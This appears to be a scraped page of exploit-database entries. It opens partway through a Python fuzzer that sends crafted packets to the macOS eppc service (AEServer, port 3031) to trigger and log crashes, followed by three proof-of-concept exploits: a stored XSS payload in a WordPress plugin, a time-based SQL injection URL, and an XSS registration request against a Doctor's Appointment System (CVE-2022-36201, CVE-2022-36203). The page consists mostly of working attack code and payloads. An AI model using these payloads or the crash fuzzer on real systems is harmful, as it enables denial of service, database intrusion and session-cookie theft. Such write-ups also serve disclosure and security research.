''))<br /><br /> if(self.original):<br /> self.pkt3 = bytes.fromhex(data[2].replace('\\x', ''))<br /> self.pkt4 = bytes.fromhex(data[3].replace('\\x', ''))<br /> self.pkt5 = bytes.fromhex(data[4].replace('\\x', ''))<br /> except Exception as error:<br /> print("failed to parse repro: %s" % error)<br /> return -1<br /><br /> sock = self.getSock()<br /><br /> if(sock == None):<br /> return -1<br /><br /> try:<br /> sock.connect((self.host, PORT))<br /> except Exception as error:<br /> print("connect() failed: %s\n" % error)<br /> return -1<br /><br /> if(self.sleep):<br /> time.sleep(SLEEP_TIME)<br /><br /> try:<br /> sock.send(self.pkt1)<br /> sock.recv(256)<br /> except socket.timeout:<br /> print("timed out")<br /> except Exception as error:<br /> print("send/recv failed for packet #1: %s\n" % error)<br /><br /> try:<br /> sock.send(self.pkt2)<br /><br /> if(self.original):<br /> sock.recv(256) # not necessary for crashing packets 1 & 2<br /> except Exception as error:<br /> print("send/recv failed for packet #2: %s\n" % error)<br /><br /> if(self.original):<br /> try:<br /> sock.send(self.pkt3)<br /> sock.recv(256)<br /> except Exception as error:<br /> print("send/recv failed for packet #3: %s\n" % error)<br /><br /> try:<br /> sock.send(self.pkt4)<br /> sock.recv(256)<br /> except Exception as error:<br /> print("send/recv failed for packet #4: %s\n" % error)<br /><br /> try:<br /> sock.send(self.pkt5)<br /> sock.recv(256)<br /> except Exception as error:<br /> print("send/recv failed for packet #5: %s\n" % error)<br /><br /> sock.close()<br /><br /> self.showRepro([])<br /><br /> if(REPORT_CRASH):<br /> self.checkReports()<br /><br /> print("done\n")<br /><br /> return 0<br /><br /> def getHex(self, data):<br /> return ''.join(f'\\x{byte:02x}' for byte in data)<br /><br /> def printHex(self, data):<br /> print(''.join(f'\\x{byte:02x}' for byte in data))<br /><br /> def showRepro(self, pkt):<br /> if(len(pkt) == len(self.pkt1)):<br /> self.printHex(pkt)<br /> else:<br /> self.printHex(self.pkt1)<br /><br /> if(len(pkt) == len(self.pkt2)):<br /> self.printHex(pkt)<br /> else:<br /> self.printHex(self.pkt2)<br /><br /> if(self.original):<br /> if(len(pkt) == len(self.pkt3)):<br /> self.printHex(pkt)<br /> else:<br /> self.printHex(self.pkt3)<br /><br /> if(len(pkt) == len(self.pkt4)):<br /> self.printHex(pkt)<br /> else:<br /> self.printHex(self.pkt4)<br /><br /> if(len(pkt) == len(self.pkt5)):<br /> self.printHex(pkt)<br /> else:<br /> self.printHex(self.pkt5)<br /><br /> print()<br /><br /> #<br /> # restore original packets<br /> #<br /> self.pkt3 = PKT_3_ORIG<br /> self.pkt4 = PKT_4_ORIG<br /> self.pkt5 = PKT_5_ORIG<br /><br /> def checkReports(self):<br /> time.sleep(2) # make sure ReportCrash has time to do its thing<br /><br /> try:<br /> logs_now = os.listdir(REPORT_DIR)<br /> except Exception as error:<br /> print("failed to open %s for reading: %s\n" % (REPORT_DIR, error))<br /> return -1<br /><br /> if(len(logs_now) > len(self.logs)):<br /> logs_new = list(set(logs_now) - set(self.logs))<br /><br /> #<br /> # if we have new crash logs, grab the pc and correlate it with repro<br /> #<br /> for log in logs_new:<br /> if(log.startswith('AEServer') and log.endswith('.crash')):<br /> log_file = REPORT_DIR + os.sep + log<br /><br /> try:<br /> with open(log_file, 'r') as file:<br /> data = file.read()<br /> except Exception as error:<br /> print("failed to read %s: %s\n" % (log, error))<br /> return -1<br /><br /> pc = re.search('0x(.*)', data)<br /><br /> if(pc != None):<br /> pc = '0x' + pc.group(1).lstrip('0')<br /> else:<br /> print("couldn't get pc from crash log\n")<br /><br /> print("found crash @ pc=%s\n" % pc)<br /><br /> #<br /> # create a crash log if we're fuzzing or replaying bytes at indices<br /> #<br /> if(self.fuzz):<br /> crash_info = 'pkt #' + str(self.pkt_num) + ' - (byte=' + hex(self.byte) + ' @ index=' + str(self.index) + ') -> ' + pc + '\n'<br /><br /> try:<br /> with open(CRASH_LOG, 'a') as file:<br /> file.write(crash_info)<br /> except Exception as error:<br /> print("failed to write %s: %s\n" % (crash_info, error))<br /> return -1<br /><br /> if(not os.path.isdir(LOG_DIR)):<br /> try:<br /> os.mkdir(LOG_DIR)<br /> except Exception as error:<br /> print("failed to mkdir %s: %s\n" % (LOG_DIR, error))<br /><br /> log_name = LOG_DIR + os.sep + os.path.basename(log_file) + '_' + str(self.byte) + '_' + str(self.index) + '_' + pc + '.txt'<br /><br /> #<br /> # move crash log file<br /> #<br /> try:<br /> shutil.move(log_file, log_name)<br /> except Exception as error:<br /> print("failed to move %s: %s\n" % (log_file, error))<br /> return -1<br /><br /> ips_file = REPORT_DIR + os.sep + log.split('.')[0] + '.ips'<br /><br /> ips_name = LOG_DIR + os.sep + os.path.basename(log_file) + '_' + str(self.byte) + '_' + str(self.index) + '_' + pc + '.txt'<br /><br /> #<br /> # check if there's an associated .ips<br /> #<br /> if(os.path.isfile(ips_file)):<br /> try:<br /> # shutil.move(ips_file, LOG_DIR)<br /> shutil.move(ips_file, ips_name)<br /> except Exception as error:<br /> print("failed to move %s: %s\n" % (ips_file, error))<br /> return -1<br /><br /> #<br /> # write repro if random fuzzing (no byte/index to replay)<br /> #<br /> # note: possible bug somewhere preventing pkt 3-5 from saving the correct repro,<br /> # (eg. if mutated with B's), so for now we're just extra verbose with output when<br /> # mutating packets and stop if pc contains 424242 so we can debug from there<br /> #<br /> repro_name = LOG_DIR + os.sep + os.path.basename(log_file) + '_' + pc + '_' + 'repro' + '.txt'<br /><br /> try:<br /> with open(repro_name, 'w') as file:<br /> file.write(self.getHex(self.pkt1))<br /> file.write('\n')<br /> file.write(self.getHex(self.pkt2))<br /><br /> if(self.original):<br /> file.write('\n')<br /> file.write(self.getHex(self.pkt3))<br /> file.write('\n')<br /> file.write(self.getHex(self.pkt4))<br /> file.write('\n')<br /> file.write(self.getHex(self.pkt5))<br /> except Exception as error:<br /> print("failed to write %s: %s\n" % (repro_name, error))<br /> return -1<br /><br /> #<br /> # temporary to help triage crashing packets<br /> #<br /> if('424242' in pc):<br /> self.showRepro([])<br /> sys.exit(0)<br /><br /> #<br /> # reset logs after move<br /> #<br /> try:<br /> self.logs = os.listdir(REPORT_DIR)<br /> except Exception as error:<br /> print("failed to list %s: %s\n" % (REPORT_DIR, error))<br /> return -1<br /><br /> return 0<br /><br />def stop(signum, frame):<br /> print()<br /> sys.exit(0)<br /><br />def arg_parse():<br /> parser = argparse.ArgumentParser()<br /><br /> parser.add_argument("host",<br /> type=str,<br /> help="target listening on eppc port 3031")<br /><br /> parser.add_argument("--fuzz",<br /> "--fuzz",<br /> default=False,<br /> action="store_true",<br /> help="sequentially exhaust bytes in each packet and display crashing PC as available")<br /><br /> parser.add_argument("--remote",<br /> "--remote",<br /> default=False,<br /> action="store_true",<br /> help="target remote hosts and turn disable local debugging support")<br /><br /> parser.add_argument("--replay",<br /> "--replay",<br /> type=str,<br /> help="replay crash with the following format [pkt:byte:index], eg. 2:ff:3")<br /><br /> parser.add_argument("--reprofile",<br /> "--reprofile",<br /> type=str,<br /> help="filename containing packet data on each line to replay (generated by random fuzzing)")<br /><br /> parser.add_argument("--original",<br /> "--original",<br /> default=False,<br /> action="store_true",<br /> help="use the original non-crashing packets")<br /><br /> parser.add_argument("--sleep",<br /> "--sleep",<br /> default=False,<br /> action="store_true",<br /> help="sleep helper for time to lldb attach after launchd creates the AEServer process upon connection (10 secs)")<br /><br /> args = parser.parse_args()<br /><br /> return args<br /><br />def main():<br /> signal.signal(signal.SIGINT, stop)<br /><br /> args = arg_parse()<br /><br /> nr = Naval(args)<br /><br /> result = nr.run()<br /><br /> if(result > 0):<br /> sys.exit(-1)<br /><br />if(__name__ == '__main__'):<br /> main()<br /></code></pre>
<pre><code># Exploit Title: Stored XSS in post_title parameter in WordPress Plugin "Netroics Blog Posts Grid" v1.0<br /># Date: 08/08/2022<br /># Exploit Author: saitamang, syad, yunaranyancat<br /># Vendor Homepage: wordpress.org<br /># Software Link: https://downloads.wordpress.org/plugin/netroics-blog-posts-grid.zip<br /># Version: 1.0<br /># Tested on: Centos 7 apache2 + MySQL<br /><br />WordPress Plugin "Netroics Blog Posts Grid" is prone to a stored cross-site scripting (XSS) vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. WordPress Plugin "Netroics Blog Posts Grid" version 1.0 is vulnerable; prior versions may also be affected.<br /><br />Login as Editor > Add testimonial > Under Title inject payload below ; parameter (post_title parameter) > Save Draft > Preview the post<br /><br /><br />payload --> user s1"><img src=x onerror=alert(document.cookie)>.gif<br /><br /><br />The draft post can be viewed using other Editor or Admin account and Stored XSS will be triggered.<br /><br />Further information can be preview from github below:<br />https://github.com/saitamang/POC-DUMP/blob/main/wordpress/Netroics%20Blog%20Posts%20Grid%20v1.0%20Stored%20XSS.md<br /></code></pre>
<pre><code># Exploit Title: SQLi - Doctor's Appointment System v1.0<br /># Google Dork: N/A<br /># Date: 7/13/2022<br /># Exploit Author: Abdullah Zaid - @_aznull<br /># Vendor Homepage:<br />https://www.sourcecodester.com/hashenudara/simple-doctors-appointment-project.html<br /># Software Link:<br />https://www.sourcecodester.com/sites/default/files/download/hshnudr/edoc-doctor-appointment-system-main_1.zip<br /># Version: 1.0<br /># Tested on: Linux<br /># CVE : CVE-2022-36201<br /><br /><br />POC:<br /><br />http://localhost/edoc/patient/booking.php?id=1%20AND%20(SELECT%203436%20FROM%20(SELECT(SLEEP(10)))dZls)<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Doctor's Appointment System v1.0 - Cross-Site Scripting (XSS)<br /># Google Dork: N/A<br /># Date: 7/13/2022<br /># Exploit Author: Abdullah Zaid - @_aznull<br /># Vendor Homepage:<br />https://www.sourcecodester.com/hashenudara/simple-doctors-appointment-project.html<br /># Software Link:<br />https://www.sourcecodester.com/sites/default/files/download/hshnudr/edoc-doctor-appointment-system-main_1.zip<br /># Version: 1.0<br /># Tested on: Linux<br /># CVE : CVE-2022-36203<br /><br />POC:<br /><br />POST /register.php HTTP/1.1<br />Host: localhost<br /><br />username=a"><script>alert(1337)</script>&password=123<br /></code></pre>